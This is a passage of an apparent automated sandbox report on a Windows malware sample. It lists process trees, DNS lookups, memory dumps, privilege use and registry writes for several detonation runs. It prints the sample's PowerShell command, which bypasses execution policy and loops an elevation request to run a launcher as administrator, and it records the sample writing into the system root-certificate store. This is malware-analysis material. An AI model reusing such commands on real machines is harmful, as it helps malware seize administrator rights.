memory/1364-10-0x000002AF53270000-0x000002AF532E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e5pncfkb.0xq.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1364-31-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp
memory/1364-34-0x00007FFAABF20000-0x00007FFAAC90C000-memory.dmp
memory/1364-35-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp
memory/1364-36-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp
memory/1364-37-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
117s
Max time network
137s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
Files
memory/3012-4-0x0000019B0AA10000-0x0000019B0AA32000-memory.dmp
memory/3012-5-0x00007FFDDEC80000-0x00007FFDDF66C000-memory.dmp
memory/3012-6-0x0000019B23050000-0x0000019B23060000-memory.dmp
memory/3012-9-0x0000019B23160000-0x0000019B231D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q2ur3mid.bgj.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3012-32-0x0000019B23050000-0x0000019B23060000-memory.dmp
memory/3012-33-0x00007FFDDEC80000-0x00007FFDDF66C000-memory.dmp
memory/3012-34-0x0000019B23050000-0x0000019B23060000-memory.dmp
memory/3012-35-0x0000019B23050000-0x0000019B23060000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4808 wrote to memory of 696 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4808 wrote to memory of 696 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4808 wrote to memory of 696 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMICON2.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMICON2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
119s
Max time network
137s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
Files
memory/4716-4-0x00000228F1290000-0x00000228F12B2000-memory.dmp
memory/4716-5-0x00007FFF28DA0000-0x00007FFF2978C000-memory.dmp
memory/4716-6-0x00000228F1110000-0x00000228F1120000-memory.dmp
memory/4716-9-0x00000228F1900000-0x00000228F1976000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vtdoqz04.3ky.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4716-30-0x00000228F1110000-0x00000228F1120000-memory.dmp
memory/4716-33-0x00007FFF28DA0000-0x00007FFF2978C000-memory.dmp
memory/4716-34-0x00000228F1110000-0x00000228F1120000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240214-en
Max time kernel
118s
Max time network
129s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMZIP64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
64s
Max time network
90s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\NcHGDdjDw8Ov.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/4372-4-0x000001613B3F0000-0x000001613B412000-memory.dmp
memory/4372-7-0x000001613B5A0000-0x000001613B616000-memory.dmp
memory/4372-16-0x00007FFAB2650000-0x00007FFAB303C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bf25stib.u4r.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4372-17-0x0000016122E60000-0x0000016122E70000-memory.dmp
memory/4372-18-0x0000016122E60000-0x0000016122E70000-memory.dmp
memory/4372-32-0x0000016122E60000-0x0000016122E70000-memory.dmp
memory/4372-34-0x00007FFAB2650000-0x00007FFAB303C000-memory.dmp
memory/4372-35-0x0000016122E60000-0x0000016122E70000-memory.dmp
memory/4372-36-0x0000016122E60000-0x0000016122E70000-memory.dmp
memory/4372-37-0x0000016122E60000-0x0000016122E70000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240214-en
Max time kernel
118s
Max time network
130s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\jqP27MaT7teI.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x41c
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3168-4-0x00007FF8E6830000-0x00007FF8E721C000-memory.dmp
memory/3168-5-0x0000021C22490000-0x0000021C224B2000-memory.dmp
memory/3168-7-0x0000021C22500000-0x0000021C22510000-memory.dmp
memory/3168-6-0x0000021C22500000-0x0000021C22510000-memory.dmp
memory/3168-10-0x0000021C22790000-0x0000021C22806000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5msxsfyw.pkv.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3168-31-0x0000021C22500000-0x0000021C22510000-memory.dmp
memory/3168-37-0x00007FF8E6830000-0x00007FF8E721C000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\mtgtTlysOs1Z.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x380
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
Files
memory/192-4-0x000002B864780000-0x000002B8647A2000-memory.dmp
memory/192-5-0x00007FF8DA030000-0x00007FF8DAA1C000-memory.dmp
memory/192-6-0x000002B84C300000-0x000002B84C310000-memory.dmp
memory/192-7-0x000002B84C300000-0x000002B84C310000-memory.dmp
memory/192-10-0x000002B864930000-0x000002B8649A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bxtcg1as.rfm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/192-31-0x000002B84C300000-0x000002B84C310000-memory.dmp
memory/192-37-0x00007FF8DA030000-0x00007FF8DAA1C000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
63s
Max time network
84s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
121s
Max time network
138s
Command Line
Signatures
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
